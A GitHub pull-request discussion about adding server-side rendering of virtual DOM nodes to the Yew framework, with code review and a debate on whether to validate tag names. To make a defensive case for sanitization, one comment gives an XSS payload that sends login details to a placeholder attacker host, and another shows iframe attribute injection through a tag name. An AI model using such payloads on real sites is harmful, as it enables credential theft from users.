Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

SSR: Stringify VNodes (II) #1344

Conversation

philip-peterson
Copy link
Contributor

@philip-peterson philip-peterson commented Jun 22, 2020

Description

Fixes #1154 by rebasing the previous draft for that issue on latest master.

Stringifying nodes should work except for VRef, which is marked as unimplemented. Conditional compilation also supported via flags -- probably closing #1155 as well. Tests are still to come, but workin on on it! Tests are in!

Checklist:

  • I have run ./ci/run_stable_checks.sh
  • I have reviewed my own code
  • I have added tests

if tag_name == "input" {
if let Some(kind) = &self.kind {
parts
.push(format!(" type=\"{}\"", htmlescape::encode_attribute(&kind)).to_string());
Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

It would be nice if htmlescape allowed whitelisting of certain characters, so we can get a space instead of   in e.g. class attributes. Might need to make an upstream PR for this, although htmlescape seems as though it may be abandonware.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I think it actually does not belong in htmlescape after all. The reason they escape so many innocuous characters is because of OWASP recommendations to do so because of developers often not quoting the attribute values. As such, I think it should be more on the consumers of such a library to do any whitelisting. That said, it's not really necessary for this use case, since any SSR-generated code isn't necessarily meant to be read anyway.

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

although htmlescape seems as though it may be abandonware.

I've looked at it (very briefly) and it doesn't seem to be a very big project – could probably maintain a fork/adopt it.

@philip-peterson
Copy link
Contributor Author

It may also be worth thinking about renaming this feature. Semantically, it could be used even if there is no server or done in the browser if desired. SSR properly would likely be some kind of toolkit on top of this to tie it all together. I would propose the name SMR: Sans-Mount Rendering.

for c in key.chars() {
let is_alnum = (c >= 'a' && c <= 'z') || (c >= '0' && c <= '9');
if !is_alnum && c != '-' && c != '_' && c != ':' {
panic!("Invalid attribute name: `{}`", &key);
Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Would it be better to have ToHtmlString::to_html_string return a Result<String, Err> instead?

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I've provided my suggestion for how this should be handled above.

yew/src/virtual_dom/vlist.rs Outdated Show resolved Hide resolved
yew/src/virtual_dom/vcomp.rs Outdated Show resolved Hide resolved
for c in key.chars() {
let is_alnum = (c >= 'a' && c <= 'z') || (c >= '0' && c <= '9');
if !is_alnum && c != '-' && c != '_' && c != ':' {
panic!("Invalid attribute name: `{}`", &key);
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I've provided my suggestion for how this should be handled above.

}
}

let is_skipped = tag_name == "textarea" && key == "value";
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Suggested change
let is_skipped = tag_name == "textarea" && key == "value";

}

let is_skipped = tag_name == "textarea" && key == "value";
if !is_skipped {
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Suggested change
if !is_skipped {
if !(tag_name == "textarea" && key == "value") {

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Why remove this semantic variable name? The conditional logic is non-obvious, I would say.

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I'd suggest adding a comment instead to explain what's happening instead of a variable name.

} else {
parts.push(">".to_string());
parts.push(children_html);
parts.push(format!("</{}>", tag_name).to_string());
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

The to_string() call shouldn't be needed here. The format! macro creates an expression returning a String. Handy documentation on format!.

Suggested change
parts.push(format!("</{}>", tag_name).to_string());
parts.push(format!("</{}>", tag_name));

yew/src/virtual_dom/vtext.rs Outdated Show resolved Hide resolved
yew/src/virtual_dom/vtext.rs Outdated Show resolved Hide resolved
@teymour-aldridge
Copy link
Contributor

This looks cool!

@philip-peterson
Copy link
Contributor Author

philip-peterson commented Jun 23, 2020

This looks cool!

Thanks! I'm excited to someday use Yew to help improve the rustdoc project.

It may also be worth thinking about renaming this feature. Semantically, it could be used even if there is no server or done in the browser if desired. SSR properly would likely be some kind of toolkit on top of this to tie it all together. I would propose the name SMR: Sans-Mount Rendering.

@teymour-aldridge What are your thoughts on the above proposal? I am thinking SSR, in contrast to SMR, would be something like "here is an app, please generate it so that I can serve it with some web server, along with related assets (which we will also need), and optionally serve it as an isomorphic app."

@philip-peterson
Copy link
Contributor Author

This PR is ready for re-review.

@philip-peterson philip-peterson mentioned this pull request Jul 4, 2020
3 tasks
@philip-peterson
Copy link
Contributor Author

philip-peterson commented Jul 4, 2020

@philip-peterson wow your validation changes are pretty thorough! As awesome as they seem at first glance, I would prefer the validation changes to be moved to a new PR / crate so that this PR can focus on generating virtual dom strings.

@jstarry Good idea! I called the crate yew-validation, if that sounds good. PR is at #1376

@jstarry
Copy link
Member

jstarry commented Jul 8, 2020

@philip-peterson thanks, can you remove the validation calls from this PR to get CI passing?

@philip-peterson
Copy link
Contributor Author

@jstarry wouldn’t we want to merge the other PR, then I can update this PR to reference the new validation crate?

@jstarry
Copy link
Member

jstarry commented Jul 9, 2020

I don't think so. Validation isn't required for this PR

@philip-peterson
Copy link
Contributor Author

The security implications are worth considering here -- we allow tags to be created with dynamic names and no validation, which given the new SSR functionality could lead to injection attacks if people put untrusted input within the dynamic names. I would say that should be inhibiting us from merging without validation.

@jstarry
Copy link
Member

jstarry commented Jul 9, 2020

The same security concerns apply to the html macro, they aren't specific to this change. I agree that they should be addressed but this isn't the place

@philip-peterson
Copy link
Contributor Author

I don’t understand how this would already be an issue in master — any untrusted input is going to be passed to a dom element constructor which would error out if there was invalid characters, no?

@jstarry
Copy link
Member

jstarry commented Jul 9, 2020

The server is responsible for producing secure and valid HTML

@jstarry
Copy link
Member

jstarry commented Jul 9, 2020

If the server sends invalid HTML, that's on the developer. I don't understand the security concerns for invalid HTML. Apps should always sanitize user input for security. It's our responsibility as a framework to make that easy, but it's not our responsibility to try to do it for them

@teymour-aldridge
Copy link
Contributor

Presumably we should add a note about this in the API docs (and the other docs – not exactly sure what to call them), and maybe emit warnings when compiling with debug_assertions?

@philip-peterson
Copy link
Contributor Author

I agree with you, @jstarry, that we don’t need to enforce security everywhere. Also agree that it’s the user’s responsibility to be secure, ultimately, and that we just need to make it easy to be secure. But what better way to make security easy than by having it be secure by default?

Also hoping to understand the motivation for not doing this check. The work has already been done, so it’s not about extra time or effort; is it just a matter of having the extra mostly orthogonal code to maintain? If so I can put more work into taginfo to make it support Yew’s use cases and add some CI, etc.

@jstarry
Copy link
Member

jstarry commented Jul 9, 2020

Maybe I just don't fully understand the security concerns that this validation addresses. Can you elaborate?

I don't want extra validation checks and code boat for production code that doesn't need it.

@philip-peterson
Copy link
Contributor Author

philip-peterson commented Jul 9, 2020

An example attack might be as follows. Say that someone is direct linking from an email to a Yew page with some query params in the URL, specifying some aspect of how the page should be displayed, and part of that is that they accept a series of tags through query params. A minimal example would be to display div vs. span, for a given page element. So they take the string div or span from the URL and construct it into a tag with <@{elem}>{ ... }</@>. This opens up an XSS vulnerability because someone can send a link with instead of div or span, some text like div><script>document.write("<img src=\"http://evilcorp.collect/" + getLoginDetails() + "\" />"); //. More details on XSS attacks here: https://owasp.org/www-community/attacks/xss/

Note that React would error out if you tried to create an element with this name, ceasing execution of the whole page, and it would either error out or escape it if it was in the attribute or child innerHTML as well, unless it was specified with dangerouslySetInnerHTML={{ __html: "..." }}. Yew actually currently (on master) would error out as well, but not if we merged this PR without validation, on the server side.

If bloat is a big concern, we could feature flag this check since it is only a problem for SSR. That said, I would be interested to run the numbers, since I doubt it would be even a 15% increase of the minimal Yew bundle size. I measured it before and it was only +17% and that was when there was a list of every possible HTML, SVG, and MathML tag in it, which there isn't now.

@jstarry
Copy link
Member

jstarry commented Jul 10, 2020

@philip-peterson thanks for the explanation. Developers could be surprised that they need to sanitize external input if using them for custom tags but I think this is just a sub-issue of general XSS attack concerns. Developers always need to validate external / user input before rendering and this case is included.

We could try to protect developers from a wide variety of XSS attacks but it requires time, complexity, code bloat, etc. I agree that we should take a closer look at this issue for dynamic tags, but I don't think it blocks SSR.

@philip-peterson
Copy link
Contributor Author

I agree that we should take a closer look at this issue for dynamic tags, but I don't think it blocks SSR.

@jstarry I'm not sure what there is to take a closer look regarding. It is a sub-issue of general XSS attack concerns, but right now Yew doesn't AFAIK have any open doors for accidental XSS attacks. I definitely do not want to introduce a door without a good reason. What is the downside of having this validation check for only SSR? It will not affect bundle size in any way.

@philip-peterson
Copy link
Contributor Author

To add some more here, I really hope Yew can rethink its stance on this issue. It is unlikely that this library could become a strong choice in the server space if the first move into such is one in which security isn't taken seriously. There is definite potential for SSR and Static Site Generation to take off but it's necessary to have the proper set of values in order to gain respect; otherwise another library or fork that does do things properly would have an advantage. My hope was always that Yew was the right space to build this featureset but it still remains to be proven.

@jstarry
Copy link
Member

jstarry commented Jul 12, 2020

Thanks for continuing the discussion @philip-peterson, I haven't been as thoughtful in my responses as I should have been. I do also care about the security of the framework.

We could try to protect developers from a wide variety of XSS attacks but it requires time, complexity, code bloat, etc. I agree that we should take a closer look at this issue for dynamic tags, but I don't think it blocks SSR.

I used a "slippery slope" argument here and would like to clarify that I do think it's worth mitigating XSS attacks in general as much as is feasible. I don't want this to be taken as "Yew doesn't care at all about XSS".

Developers could be surprised that they need to sanitize external input if using them for custom tags but I think this is just a sub-issue of general XSS attack concerns. Developers always need to validate external / user input before rendering and this case is included.

I'd like to take this statement back and assert that Yew should do its best to help developers avoid security concerns in general. I think we need issues to discuss the current security holes as well as documentation outlining what is currently protected against and what is not. Developers should always be careful with external input and pay attention to security when developing apps but we should provide them with adequate protection, tools, and information.

but right now Yew doesn't AFAIK have any open doors for accidental XSS attacks

It's possible to create script tags on SSR pages, which could be unintended.


@philip-peterson could you please expand on why validating tags and properties protects against XSS, I still don't understand. To me, validating html output is not a requirement for SSR but I do agree that addressing security concerns is a requirement and it's great that you put all the html escaping in place already. Thanks for bearing with me on this :)

@philip-peterson
Copy link
Contributor Author

philip-peterson commented Jul 15, 2020

I investigated a bit more, and actually found that we still have the htmlescape crate which provides (duplicitous) protection from XSS, so I actually couldn't figure out a way to launch a proper XSS attack. (We actually might need to remove that htmlescape call to support custom tags, but that's a tangent.) Importantly though, the htmlescape doesn't properly escape everything needed for a tag name, so it allows spaces and equals signs which can be used to inject attributes. As a result, if the Yew SSR app looks like this:

<@{untrusted_input} someProp="foo">{ "some static text" }</@>

an attacker can provide a value such that untrusted_input equals, for example, iframe src=http://google.com/ allow=..., resulting in the following Yew SSR-generated HTML:

<iframe src=http://google.com/ allow=... someProp="foo">some static text</iframe src=http://google.com/ allow=...>

One can imagine, if the attributes of iframe are expanded in the future to allow more easy control over what kind of access the source document has, that this could cause a more serious vulnerability. Even now though, this would allow the attacking iframe to issue a redirect, form submission, or popup window. There may be other injectable content that triggers an attack, such as a malicious img, though I couldn't find anything at the moment. Presence of an img with a custom src, though, which is possible through this vulnerability, would allow user tracking and arbitrary execution of scripts.

The moral of the story though is that the developer of the Yew app was only allowing the user to specify the tag name, and because of an injection attack, it actually specifies the tag name and attributes. This shouldn't be possible in an application that runs in Rust where the expectation is that safety is of utmost priority and under control.

That was the world without tag name validation. Imagine that if we disallowed on the server-side the creation of any tag that had a tag name that wasn't valid per this function. That function certainly returns false for the string "iframe src=http://google.com/ allow=...", so the construction of the tag would be disallowed, and Yew would error out, halting execution, so that is why this check prevents the injection vector.

@philip-peterson
Copy link
Contributor Author

philip-peterson commented Jul 15, 2020

I appreciate your response though, @jstarry . To respond to some of the particular comments,

we should provide [developers] with adequate protection, tools, and information

I agree, and even if there was a strong reason for us not to have this strict validation behavior by default, providing the functionality to do so (the tool) itself would mean having the validation logic be distributed as part of Yew. Otherwise, how would we be providing anything?

To me, validating html output is not a requirement for SSR [...] It's possible to create script tags on SSR pages, which could be unintended.

I don't understand this approach really. SSR is a brand new feature, so any weakness it introduces is strictly a regression in the Yew safety guarantees. Just to reiterate, the unsafe behavior mentioned above is not currently possible with Yew, because the browser provides these validation checks for Yew at the present time through the DOM API.

Screen Shot 2020-07-14 at 8 30 55 PM

I think we need issues to discuss the current security holes as well as documentation outlining what is currently protected against and what is not.

I appreciate the notion that there will be some issues that would be overkill to address or protect from, but we are fortunately in the position of being able to see how other frameworks handle these issues, particularly React which does both SSR and client-side rendering successfully. React provides a good model to determine what's feasible, and it should be noted that there are no XSS attacks possible with React beyond users either intentionally circumventing the React API, or through the property dangerouslySetInnerHtml.__html, which is for good reason named to be very inconvenient.

@jstarry
Copy link
Member

jstarry commented Jul 19, 2020

@philip-peterson hey, thanks for your responses. Seems like we are close to being on the same page!

It seems to me that not having validation for tag names and properties is not needed for XSS prevention, htmlescape is sufficient. Do you agree?

It seems that outside of the concern of XSS, you think it would be nice if Yew guarantees that it is outputting valid HTML strings that a browser would accept. Is that correct?

Anything else to discuss further?

@philip-peterson
Copy link
Contributor Author

@jstarry Sure thing.

It seems to me that not having validation for tag names and properties is not needed for XSS prevention, htmlescape is sufficient. Do you agree?

Only in that I personally wasn't able to produce a failing test case. The fundamental issue is improper sanitization, which is still a concern on this PR. There are two side effects currently: attribute injection, and inconsistent server / client behavior.

htmlescape will possibly need to be removed for tag names, because it doesn't fulfill its intended purpose in that usage, and I suspect it will interfere with the instantiation of dynamic tags, although I haven't tested that.

It seems that outside of the concern of XSS, you think it would be nice if Yew guarantees that it is outputting valid HTML strings that a browser would accept.

I don't think this is a summary of the issue; the browser will accept lots of things, too many even. The guarantee should be that Yew SSR generates HTML strings that an HTML validator would accept, although that is a weaker form of the proper guarantee, which is that Yew SSR generates HTML strings that client-side Yew would generate.

@philip-peterson
Copy link
Contributor Author

Also, separately, I realized that SSR currently doesn't work when a VComp is being rendered, so that is a TODO on this PR.

@jstarry
Copy link
Member

jstarry commented Aug 15, 2020

I don't think this is a summary of the issue; the browser will accept lots of things, too many even. The guarantee should be that Yew SSR generates HTML strings that an HTML validator would accept, although that is a weaker form of the proper guarantee, which is that Yew SSR generates HTML strings that client-side Yew would generate.

I hadn't considered enforcing consistent behaviour between client / server side Yew. That seems desirable. You also raise a good point that browsers aren't the sole consumers of the generated HTML (despite being the vast majority of use cases).

I'm still a little unconvinced of this validation approach but in the interest of keeping development moving (it's stalled a considerable amount already 😞 ) let's move forward and we can rethink later if performance issues / edge cases come up.

@johnbcoughlin
Copy link

Thank you both for putting in so much work on this already! Is this PR stalled? Is there anything I can do to help it land?

@philip-peterson
Copy link
Contributor Author

Hello, and thanks for the interest. Right now the PR is not blocked but it does require going in and creating alternate code paths for SSR rendering for mount etc. It should be as simple as copy and paste plus some clever renames. There may be a bit more follow up after that but it’s the main thing I’ve been avoiding because it’s “ugh” work. I’d be open to collaboration if there is an interest.

@jkelleyrtp jkelleyrtp mentioned this pull request Nov 16, 2020
3 tasks
@philip-peterson
Copy link
Contributor Author

philip-peterson commented Jan 12, 2021

This PR is superseded by the work on yew-static. Closing this PR since future work will be done on the yew-static repository and in the #ssr channel of Yew Discord.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
Status: History
Development

Successfully merging this pull request may close these issues.

[SSR] Add and implement ToHtmlString trait for all virtual dom nodes
5 participants